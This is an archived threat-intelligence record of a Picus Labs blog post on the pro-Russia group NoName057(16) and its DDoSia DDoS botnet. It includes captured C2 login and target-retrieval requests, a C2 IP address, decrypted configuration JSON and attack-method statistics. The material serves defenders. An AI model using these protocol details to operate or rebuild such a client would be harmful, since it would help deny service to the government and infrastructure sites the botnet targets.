{
	"id": "683258c7-08c3-4cb2-9dc3-3f94f30b4f0d",
	"created_at": "2026-04-06T00:15:16.344215Z",
	"updated_at": "2026-04-10T03:36:45.648198Z",
	"deleted_at": null,
	"sha1_hash": "4912019a1595eb4781fd4917252a45186863b5bd",
	"title": "How NoName057(16) Uses DDoSia to Attack NATO Targets",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 64266,
	"plain_text": "How NoName057(16) Uses DDoSia to Attack NATO Targets\r\nBy Picus Labs\r\nPublished: 2025-12-15 · Archived: 2026-04-02 12:47:48 UTC\r\nWho Is NoName057(16)?\r\nNoName057(16), also known as 05716nnm, Nnm05716, NoName057 and NoName05716, is a pro-Russia\r\nhacktivist entity assessed to have originated as a covert project within the Centre for the Study and Network\r\nMonitoring of the Youth Environment (CISM), operating on behalf of the Kremlin. Evidence indicates that CISM\r\nleadership and staff provided the group with extensive support, developing its proprietary DDoS tool known as\r\nDDoSia, supplying the underlying infrastructure, administering its Telegram channels, and directing target\r\nselection.\r\nActive since March 2022, the group primarily conducts distributed denial-of-service attacks against government\r\nand private-sector organizations in NATO member states and other European countries viewed as adversarial to\r\nRussian geopolitical goals. Its operations rely heavily on Telegram for coordination and dissemination, while\r\nhosting tools and tactics on platforms such as GitHub to mobilize followers.\r\nBy 2024, NoName057(16) expanded its reach through close collaboration with other pro-Russia hacktivist groups,\r\nmost notably the Cyber Army of Russia Reborn (CARR). This partnership produced a joint chat by mid-year and\r\nculminated in shared claims of an intrusion targeting operational-technology assets in the United States. Their\r\nincreasing operational overlap eventually contributed to the formation of Z-Pentest in September 2024, a hybrid\r\ngroup consisting of administrators and operators from both communities. Z-Pentest has continued to reference\r\nNoName057(16) in its own campaigns, signalling sustained influence.\r\nThe group is also referenced by regional designators such as \"NoName057(16) Spain,\" \"NoName057(16) Italy,\"\r\nand \"NoName057(16) France\" [1].\r\nIn July 2025, NoName057(16) became the focus of Operation Eastwood, a coordinated international law\r\nenforcement effort conducted from July 14 to July 17. Authorities made two arrests, one in France and one in\r\nSpain. Seven arrest warrants were issued, six by Germany and one by Spain. In addition, 24 house searches took\r\nplace across Czechia, France, Germany, Italy, Poland, and Spain. Following the operation, the group’s official\r\nTelegram channel dismissed the actions, encouraged followers to reject what it called misinformation from foreign\r\nservices, and reaffirmed its ongoing commitment to information operations in support of Russia [2].\r\nWhat is DDoSia?\r\nEmerging shortly after the onset of the conflict in Ukraine, NoName057(16) operates as a digitally partisan entity\r\naligned with Russian strategic interests. The group's primary offensive capability, the DDoSia Project, is the\r\nsuccessor to the earlier \"Bobik\" botnet. The project relies on volunteers who are recruited via Telegram, provided\r\nwith the necessary toolkit, and incentivized through cryptocurrency rewards.\r\nhttps://www.picussecurity.com/resource/blog/how-noname05716-uses-ddosia-to-attack-nato-targets\r\nPage 1 of 6\n\nThe DDoSia client is developed in Go and is designed for ease of use, allowing individuals with minimal\r\ntechnical expertise to participate in attacks.\r\nTechnical Analysis: The DDoSia Kill Chain\r\nThe operational flow of the DDoSia client involves a two-stage communication process with the Command and\r\nControl (C2) server to retrieve target configurations [2].\r\nStage 1: Client Login and Authentication\r\nCommunication is initiated by the client sending an HTTP POST request to the C2 server's /client/login endpoint.\r\nThis step is used to register the client instance and validate its authenticity.\r\nA critical component is the Cookie header, which transmits the User Hash (U) and the Client ID (C). The body of\r\nthe request contains encrypted system information, including the OS, kernel version, and CPU details.\r\nPOST /client/login HTTP/1.1\r\nHost: 38.180.143[.]83\r\nUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like\r\nGecko) Mobile/15E148 [LinkedInApp]/9.28.7586\r\nContent-Length: 515\r\nAccept: text/html,application/xhtml+xml,application/xml,\r\nAccept-Encoding: gzip, deflate, br\r\nAccept-Language: en-US,en;q=0.5\r\nContent-Type: application/json\r\nCookie: U=\u003cREDACTED\u003e; C=\u003cREDACTED\u003e\r\n{\"body\": \"Eo+B/j5dX0s7QoVL+74DQxkUqE460PLgskFIPfAKzr4DHK6hpoYbe74kkXJLub90SKfSt\r\nAlmrXv47570ygFXvR89IYbjay9rzxdpNBMWEaQYag7SE6z4Ge3iqnMvN3rGRvrUI50cqcbl0Jzbav7\r\nKmzvt3k0H+eYgwjOI8OnG3Fuuhp+xOkPjakOmJkLrJJOTompsrIsiK7dbtFG08xp8R04S+YnCqCgRu\r\nfYpHmQLJ0IpNy4+MKyfpzDL0bv46SSqcLZuFZdZHzaUdRjHCAglbdGNYDMeO8FU93xWbh6k/3KPk8u\r\n5pXgSHNvLc11Ly+EddgeWjJr8qZDRr/N/HL3bhLLNqBFKKOj04aWnbg7FdspSbyF70ReIAEr2utUc7\r\neKAPbc6eXa2g5YcsclgdCJlofc0SvNZ7wiXdnkI11XRTAvaX/drsLvjAJmJ58YF2H471mVvaBIjGmV\r\n2N8iglErdoHRegy7F0F1x5b6SHbcLQ5KL836olsl/722a\"}\r\nThe payload is encrypted using AES-GCM, with a key dynamically generated from the User Hash and Client ID.\r\nUpon decryption, the JSON structure reveals the detailed system fingerprint of the volunteer's machine.\r\n{\r\n    \"key\": \"\u003cREDACTED\u003e\",\r\n    \"user\": \"\u003cREDACTED\u003e\",\r\n    \"client\": \"\u003cREDACTED\u003e\",\r\n    \"inf\": {\r\n        \"SystemUserName\": \"DESKTOP-QOG2741\",\r\n        \"OS\": \"windows\",\r\nhttps://www.picussecurity.com/resource/blog/how-noname05716-uses-ddosia-to-attack-nato-targets\r\nPage 2 of 6\n\n\"KernelVersion\": \"10.0.19041.2965 Build 19041.2965\",\r\n        \"KernelArch\": \"x86_64\",\r\n        \"PlatformFamily\": \"Standalone Workstation\",\r\n        \"CPUCores\": 8,\r\n        \"RegisterTime\": \"2025-07-10T14:22:18.134954+01:00\",\r\n        \"Timezone\": \"CEST\"\r\n    }\r\n}\r\nSuccessful authentication is acknowledged by the C2 server with a 200 OK response containing a UNIX\r\ntimestamp.\r\nHTTP/1.1 200 OK\r\nServer: nginx/1.18.0 (Ubuntu)\r\nDate: Fri, 14 Jun 2024 15:18:17 GMT\r\nContent-Type: text/plain; charset=utf-8\r\nContent-Length: 19\r\nConnection: keep-alive\r\n1718378297196554765\r\nStage 2: Target Acquisition\r\nFollowing registration, the client initiates the second stage to retrieve the attack configuration via a GET request to\r\n/client/get_targets. \r\nGET /client/get_targets HTTP/1.1\r\nHost: 38[.180[.]143[.]83\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.0.0) Gecko/20020623 Debian/1.0.0-0.woody.1\r\nAccept: text/html,application/xhtml+xml,application/xml,\r\nAccept-Encoding: gzip, deflate, br\r\nAccept-Language: en-US,en;q=0.5\r\nContent-Type: application/json\r\nCookie: U=\u003cREDACTED\u003e; C=\u003cREDACTED\u003e; K=NUYZ627M42\u003cREDACTED\u003eDMA6NLJ4YAM======\r\nThe C2 server responds with an encrypted JSON object containing the target list, utilizing the same AES-GCM\r\nencryption method established during the login phase.\r\n{\"data\":\"aCeegN8A+CvFX11L17b8dZpk67zwVZtTMR8R0ZhDrn3rNpFTq55dyjJ2pw8etiyLlW3SI\r\nr8c3XVcmBpjzNXdHZYyqi8SVByLp4clIi+7gGT84...\u003cREDACTED\u003e.../rblN+dJq8037tw9y7Htnapy\r\n887JRLFP0ao83w1YYed3jvjwFWWCu0vMvTjjKzuxXPDFb8KXWUMJw==\"}\r\nDecryption of this payload reveals two primary keys: targets and randoms. The targets array specifies the victim\r\nhost, port, and attack protocol (e.g., http2), while randoms defines parameters for generating variable data to\r\nappend to requests, a technique likely employed to bypass caching and simple filtering mechanisms.\r\nhttps://www.picussecurity.com/resource/blog/how-noname05716-uses-ddosia-to-attack-nato-targets\r\nPage 3 of 6\n\n{\r\n    \"targets\": [\r\n        {\r\n            \"target_id\": \"64865791f747b0b90020d960\",\r\n            \"request_id\": \"64865791f747b0b90020d961\",\r\n            \"host\": \"\u003cREDACTED\u003e\",\r\n            \"ip\": \"\u003cREDACTED\u003e\",\r\n            \"type\": \"http2\",\r\n            \"method\": \"GET\",\r\n            \"port\": 443,\r\n            \"use_ssl\": true,\r\n            \"path\": \"\",\r\n            \"body\": {\r\n                \"type\": \"str\",\r\n                \"value\": \"\"\r\n            },\r\n            \"headers\": null\r\n        }\r\n    ],\r\n    \"randoms\": [\r\n        {\r\n            \"name\": \"\\u0422\\u0435\\u043b\\u0435\\u0444\\u043e\\u043d\",\r\n            \"id\": \"62d8286fddcbb37b0c77c87f\",\r\n            \"digit\": true,\r\n            \"upper\": false,\r\n            \"lower\": false,\r\n            \"min\": 11,\r\n            \"max\": 11\r\n        }\r\n    ]\r\n}\r\nInfrastructure and Operational Security\r\nA resilient, multi-tiered infrastructure is employed to protect the backend servers from discovery and mitigation\r\n[2].\r\nTier 1 (C2 Servers): These are public-facing servers that communicate directly with DDoSia clients on Port\r\n80. They act as ephemeral proxies, with an average lifespan of approximately nine days, though many are\r\nrotated daily.\r\nTier 2 (Backend Servers): These servers host the core logic and target lists. Access is strictly controlled via\r\nAccess Control Lists (ACLs), which only permit connections from known Tier 1 servers.\r\nhttps://www.picussecurity.com/resource/blog/how-noname05716-uses-ddosia-to-attack-nato-targets\r\nPage 4 of 6\n\nThis configuration ensures that even if Tier 1 nodes are identified and blocked, the core infrastructure remains\r\nsecure and operational.\r\nOperational Tempo and Targeting\r\nAnalysis of activity between July 2024 and July 2025 reveals a high operational tempo, with an average of 50\r\nunique targets attacked daily. Activity patterns strongly correlate with a standard Russian work schedule. New\r\ntargets are consistently added in two daily waves: a primary surge between 05:00 and 07:00 UTC and a secondary\r\nwave around 11:00 UTC.\r\nSectoral and Geographic Focus\r\nTargeting is heavily concentrated on European nations opposing Russia's invasion of Ukraine. Geographically,\r\nUkraine accounts for the largest share of attacks at 29.47%, followed by France at 6.09%, Italy at 5.39%, Sweden\r\nat 5.29%, and Germany at 4.60%. \r\nIn terms of industry distribution, the Government and public sectors are the primary targets, comprising 41.09% of\r\nincidents. This is followed by transportation and logistics at 12.44% and telecommunications at 10.19% [2].\r\nAttack Techniques\r\nA combination of volumetric and resource-exhaustion attacks is utilized to disrupt services. The most common\r\nmethods include TCP Floods, specifically SYN floods at 17.6% and ACK floods at 16.1%, as well as Application\r\nLayer Attacks such as HTTP GET floods at 15.4%. Slow Loris variants, identified as nginx_loris, account for\r\n31.5% of the activity and operate by exhausting server connection slots through partial HTTP requests sent at a\r\nslow rate.\r\nAdditionally, Port 443 (HTTPS) and Port 80 (HTTP) account for the vast majority of attack traffic at 66%,\r\nreflecting a distinct focus on web-facing services [2].\r\nHow Picus Simulates NoName057(16) Attacks?\r\nWe also strongly suggest simulating NoName057(16) Attacks to test the effectiveness of your security controls\r\nagainst real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against\r\nhundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.\r\nPicus Threat Library includes the following threats for NoName057(16):\r\nThreat ID Threat Name Attack Module\r\n32591 DDOSIA DDoS Malware Email Threat Network Infiltration\r\nhttps://www.picussecurity.com/resource/blog/how-noname05716-uses-ddosia-to-attack-nato-targets\r\nPage 5 of 6\n\n51123 DDOSIA DDoS Malware Download Threat Network Infiltration\r\nStart simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus\r\nSecurity Validation Platform.\r\nKey Takeaways\r\nNoName057(16) originated as a covert project within the Kremlin-backed CISM, targeting NATO and\r\nEuropean entities since March 2022.\r\nThe group relies on the DDoSia project, a crowdsourced botnet that rewards volunteers with\r\ncryptocurrency for launching attacks using simple, Go-based tools.\r\nTechnical operations involve a two-stage kill chain where clients authenticate and retrieve encrypted target\r\nlists from Command and Control servers via AES-GCM.\r\nA multi-tier architecture uses ephemeral public proxies to shield backend servers from direct detection and\r\nmitigation.\r\nPartnerships with the Cyber Army of Russia Reborn led to the formation of the hybrid group Z-Pentest in\r\n2024, expanding operations to US operational technology targets.\r\nAttacks predominantly focus on government sectors in Ukraine, France, and Italy, with activity surges\r\naligning with standard Russian work schedules.\r\nOperation Eastwood executed international arrests and searches against the group in July 2025, though the\r\nentity remains active and defiant.\r\nReferences\r\n[1] Accessed: Dec. 12, 2025. [Online]. Available: https://www.cisa.gov/sites/default/files/2025-12/aa25-343a-pro-russia-hacktivists-conduct-attacks.pdf\r\n[2] N. ’s D. Infrastructure, “Anatomy of DDoSia:” Accessed: Dec. 12, 2025. [Online]. Available:\r\nhttps://assets.recordedfuture.com/insikt-report-pdfs/2025/cta-2025-0722.pdf\r\nSource: https://www.picussecurity.com/resource/blog/how-noname05716-uses-ddosia-to-attack-nato-targets\r\nhttps://www.picussecurity.com/resource/blog/how-noname05716-uses-ddosia-to-attack-nato-targets\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.picussecurity.com/resource/blog/how-noname05716-uses-ddosia-to-attack-nato-targets"
	],
	"report_names": [
		"how-noname05716-uses-ddosia-to-attack-nato-targets"
	],
	"threat_actors": [
		{
			"id": "d58f7d9f-abb3-4e78-a13a-b87399fc03e5",
			"created_at": "2024-04-20T02:00:03.559673Z",
			"updated_at": "2026-04-10T02:00:03.618525Z",
			"deleted_at": null,
			"main_name": "Cyber Army of Russia Reborn",
			"aliases": [],
			"source_name": "MISPGALAXY:Cyber Army of Russia Reborn",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b05a0147-3a98-44d3-9b42-90d43f626a8b",
			"created_at": "2023-01-06T13:46:39.467088Z",
			"updated_at": "2026-04-10T02:00:03.33882Z",
			"deleted_at": null,
			"main_name": "NoName057(16)",
			"aliases": [
				"NoName057",
				"NoName05716",
				"05716nnm",
				"Nnm05716"
			],
			"source_name": "MISPGALAXY:NoName057(16)",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6c532a3a-8977-4f5e-aa4f-311e19952e2f",
			"created_at": "2026-03-24T02:00:04.630235Z",
			"updated_at": "2026-04-10T02:00:03.989041Z",
			"deleted_at": null,
			"main_name": "Z-Pentest Alliance",
			"aliases": [
				"Z-Pentest"
			],
			"source_name": "MISPGALAXY:Z-Pentest Alliance",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434516,
	"ts_updated_at": 1775792205,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4912019a1595eb4781fd4917252a45186863b5bd.pdf",
		"text": "https://archive.orkl.eu/4912019a1595eb4781fd4917252a45186863b5bd.txt",
		"img": "https://archive.orkl.eu/4912019a1595eb4781fd4917252a45186863b5bd.jpg"
	}
}